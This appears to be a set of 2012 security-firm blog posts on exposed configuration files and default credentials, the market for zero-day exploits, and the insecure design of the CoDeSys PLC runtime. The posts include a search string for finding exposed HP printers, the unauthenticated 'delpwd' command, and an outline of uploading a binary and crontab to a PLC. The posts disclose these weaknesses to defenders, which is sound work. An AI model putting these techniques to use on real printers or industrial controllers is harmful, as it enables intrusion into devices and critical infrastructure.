Unauthorized access to multiple components and software configuration files is another big problem. This is not only a device and software configuration problem, but also a byproduct of design chaos i.e. the way different network devices are designed and managed in the default state. Too many devices on the Internet allow guests to obtain potentially sensitive information using anonymous access or direct access. In addition, one has to wonder about how well administrators understand and care about security if they simply allow configuration files to be downloaded from target servers. For example, I recently conducted a small test to verify the presence of the file Filezilla.xml, which sets the properties of FileZilla FTP servers, and found that a number of target servers allow this configuration file to be downloaded without any authorization and authentication controls. This would allow attackers to gain direct access to these FileZilla FTP servers because the passwords are embedded in these configuration files.

 

 

 

FileZilla Configuration File with Password

It is really hard to imagine that anyone would deploy sensitive files containing usernames and passwords on remote servers that are exposed on the network. What results do you expect when you find these types of configuration issues?

 

XLS File Containing Credentials for Third-party Resources
The presence of multiple administration interfaces widens the attack surface because every single interface makes available different attack vectors. A number of network-based devices have SSH, Telnet, FTP, and Web administration interfaces. The default installation of a network device activates at least two or three different interfaces for remote management. This allows attackers to attack network devices by exploiting inherent weaknesses in the protocols used. In addition to that, the presence of default credentials can further ease the process of exploitation. For example, it is easy to find a large number of unmanaged network devices on the Internet without proper authentication and authorization.

 

 

 
Cisco Catalyst – Insecure Interface
How can we forget about backend databases? The presence of default and weak passwords for the MS SQL system administrator account is still a valid configuration that can be found in the internal networks of many organizations. For example, network proxies that require backend databases are configured with default and weak passwords. In many cases administrators think internal network devices are more secure than external devices. But, what happens if the attacker finds a way to penetrate the internal network
Thesimple answer is: game over. Integrated web applications with backend databases using default configurations are an “easy walk in the park” for attackers. For example, the following insecure XAMPP installation would be devastative.

 

 

 
XAMPP Security – Web Page
The security community recently encountered an interesting configuration issue in the GitHub repository (http://www.securityweek.com/github-search-makes-easy-discovery-encryption-keys-passwords-source-code), which resulted in the disclosure of SSH keys on the Internet. The point is that when you own an account or repository on public servers, then all administrator responsibilities fall on your shoulders. You cannot blame the service provider, Git in this case. If users upload their private SSH keys to the repository, then whom can you blame? This is a big problem and developers continue to expose sensitive information on their public repositories, even though Git documents show how to secure and manage sensitive data.
Another interesting finding shows that with Google Dorks (targeted search queries), the Google search engine exposed thousands of HP printers on the Internet (http://port3000.co.uk/google-has-indexed-thousands-of-publicly-acce). The search string “inurl:hp/device/this.LCDispatcher?nav=hp.Print” is all you need to gain access to these HP printers. As I asked at the beginning of this post, “How long does it take to secure a printer?” Although this issue is not new, the amazing part is that it still persists.
The existence of vulnerabilities and patches is a completely different issue than the security issues that result from default configurations and poor administration. Either we know the security posture of the devices and software on our networks but are being careless in deploying them securely, or we do not understand security at all. Insecure and default configurations make the hacking process easier. Many people realize this after they have been hacked and by then the damage has already been done to both reputations and businesses.
This post is just a glimpse into security consciousness, or the lack of it. We have to be more security conscious today because attempts to hack into our networks are almost inevitable. I think we need to be a bit more paranoid and much more vigilant about security.

 

 

 

INSIGHTS | December 20, 2012

Exploits, Curdled Milk and Nukes (Oh my!)

Throughout the second half of 2012 many security folks have been asking “how much is a zero-day vulnerability worth?” and it’s often been hard to believe the numbers that have been (and continue to be) thrown around. For the sake of clarity though, I do believe that it’s the wrong question… the correct question should be “how much do people pay for working exploits against zero-day vulnerabilities?”

The answer in the majority of cases tends to be “it depends on who’s buying and what the vulnerability is” regardless of the questions particular phrasing.

On the topic of exploit development, last month I wrote an article for DarkReading covering the business of commercial exploit development, and in that article you’ll probably note that I didn’t discuss the prices of what the exploits are retailing for. That’s because of my elusive answer above… I know of some researchers with their own private repository of zero-day remote exploits for popular operating systems seeking $250,000 per exploit, and I’ve overheard hushed bar conversations that certain US government agencies will beat any foreign bid by four-times the value.

But that’s only the thin-edge of the wedge. The bulk of zero-day (or nearly zero-day) exploit purchases are for popular consumer-level applications – many of which are region-specific. For example, a reliable exploit against Tencent QQ (the most popular instant messenger program in China) may be more valuable than an exploit in Windows 8 to certain US, Taiwanese, Japanese, etc. clandestine government agencies.

More recently some of the conversations about exploit sales and purchases by government agencies have focused in upon the cyberwar angle – in particular, that some governments are trying to build a “cyber weapon” cache and that unlike kinetic weapons these could expire at any time, and that it’s all a waste of effort and resources.

I must admit, up until a month ago I was leaning a little towards that same opinion. My perspective was that it’s a lot of money to be spending for something that’ll most likely be sitting on the shelf that will expire in to uselessness before it could be used. And then I happened to visit the National Museum of Nuclear Science & History on a business trip to Albuquerque.

Museum: Polaris Missile

 

Museum: Minuteman missile part?

For those of you that have never heard of the place, it’s a museum that plots out the history of the nuclear age and the evolution of nuclear weapon technology (and I encourage you to visit!).

Anyhow, as I literally strolled from one (decommissioned) nuclear missile to another – each laying on its side rusting and corroding away, having never been used, it finally hit me – governments have been doing the same thing for the longest time, and cyber weapons really are no different!

Perhaps it’s the physical realization of “it’s better to have it and not need it, than to need it and not have it”, but as you trace the billions (if not trillions) of dollars that have been spent by the US government over the years developing each new nuclear weapon delivery platform, deploying it, manning it, eventually decommissioning it, and replacing it with a new and more efficient system… well, it makes sense and (frankly) it’s laughable how little money is actually being spent in the cyber-attack realm.

So what if those zero-day exploits purchased for measly 6-figured wads of cash curdle like last month’s milk? That price wouldn’t even cover the cost of painting the inside of a decommissioned missile silo.

No, the reality of the situation is that governments are getting a bargain when it comes to constructing and filling their cyber weapon caches. And, more to the point, the expiry of those zero-day exploits is a well understood aspect of managing an arsenal – conventional or otherwise.

— Gunter Ollmann, CTO – IOActive, Inc.

INSIGHTS | October 30, 2012

3S Software’s CoDeSys: Insecure by Design

My last project before joining IOActive was “breaking” 3S Software’s CoDeSys PLC runtime for Digital Bond.

Before the assignment, I had a fellow security nut give me some tips on this project to get me off the ground, but unfortunately this person cannot be named. You know who you are, so thank you, mystery person.

The PLC runtime is pretty cool, from a hacker perspective. CoDeSys is an unusual ladder logic runtime for a number of reasons.

 

Different vendors have different strategies for executing ladder logic. Some run ladder logic on custom ASICs (or possibly interpreter/emulators) on their PLC processor, while others execute ladder logic as native code. For an introduction to reverse-engineering the interpreted code and ASIC code, check out FX’s talk on Decoding Stuxnet at C3. It really is amazing, and FX has a level of patience in disassembling code for an unknown CPU that I think is completely unique.

 

CoDeSys is interesting to me because it doesn’t work like the Siemens ladder logic. CoDeSys compiles your ladder logic as byte code for the processor on which the ladder logic is running. On our Wago system, it was an x86 processor, and the ladder logic was compiled x86 code. A CoDeSys ladder logic file is literally loaded into memory, and then execution of the runtime jumps into the ladder logic file. This is great because we can easily disassemble a ladder logic file, or better, build our own file that executes system calls.

 

I talked about this oddity at AppSec DC in April 2012. All CoDeSys installations seem to fall into three categories: the runtime is executing on top of an embedded OS, which lacks code privilege separation; the runtime is executing on Linux with a uid of 0; or the runtime is executing on top of Windows CE in single user mode. All three are bad for the same reasons.

 

All three mean of course that an unauthenticated user can upload an executable file to the PLC, and it will be executed with no protection. On Windows and Linux hosts, it is worse because the APIs to commit Evil are well understood.

 

 I had said back in April that CoDeSys is in an amazing and unique position to help secure our critical infrastructure. Their product is used in thousands of product lines made by hundreds of vendors. Their implementation of secure ladder logic transfer and an encrypted and digitally signed control protocol would secure a huge chunk of critical infrastructure in one pass.

 

3S has published an advisory on setting passwords for CoDeSys as the solution to the ladder logic upload problem. Unfortunately, the password is useless unless the vendors (the PLC manufacturers who run CoDeSys on their PLC) make extensive modification to the runtime source code.

 

Setting a password on CoDeSys protects code segments. In theory, this can prevent a user from uploading a new ladder logic program without knowing the password. Unfortunately, the shell protocol used by 3S has a command called delpwd, which deletes the password and does not require authentication. Further, even if that little problem was fixed, we still get arbitrary file upload and download with the privileges of the process (remember the note about administrator/root?). So as a bad guy, I could just upload a new binary, upload a new copy of the crontab file, and wait patiently for the process to execute.

 

The solution that I would like to see in future CoDeSys releases would include a requirement for authentication prior to file upload, a patch for the directory traversal vulnerability, and added cryptographic security to the protocol to prevent man-in-the-middle and replay attacks.

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close